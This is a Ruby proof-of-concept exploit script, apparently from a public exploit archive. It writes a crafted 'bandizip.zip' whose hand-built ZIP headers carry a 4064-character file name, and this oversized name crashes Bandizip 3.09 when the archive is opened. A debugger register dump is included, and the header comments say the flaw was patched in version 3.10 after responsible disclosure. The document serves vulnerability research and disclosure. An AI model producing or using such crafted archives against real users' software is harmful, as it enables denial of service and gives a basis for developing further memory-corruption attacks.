#!/usr/bin/env ruby
# Exploit Title: Bandizip 3.09 .zip Crash POC
# Date: February 6th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<at>gmail.com
# Version: 3.09 32bit and 64bit (Below versions might be affected)
# Vendor Homepage: https://www.bandisoft.com/
# Tested on: Windows XP 32-bit SP2 en, Windows 8 64-bit
# This issue is patched in Bandizip 3.10 after a responsible disclosure
# Open this crafted file and double click on it in the app it self

=begin
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
770be1a4 c21400          ret     14h
=end

# Ensure we have valid ZIP Header
lf_header =  "\x50\x4B\x03\x04\x14\x00\x00" 
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"
lf_header += "\xe4\x0f" #file size
lf_header += "\x00\x00\x00"

cdf_header =  "\x50\x4B\x01\x02\x14\x00\x14" 
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf_header += "\xe4\x0f" # file size
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00" 
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00"

eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes)
eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory,relative to start of archive
eofcdf_header += "\x00\x00"

# Our Payload
payload = "A" * 4064
payload += ".txt"

Exploit = lf_header + payload + cdf_header + payload + eofcdf_header

f=File.open('bandizip.zip', 'w')
f.write(Exploit)
f.close
#EOF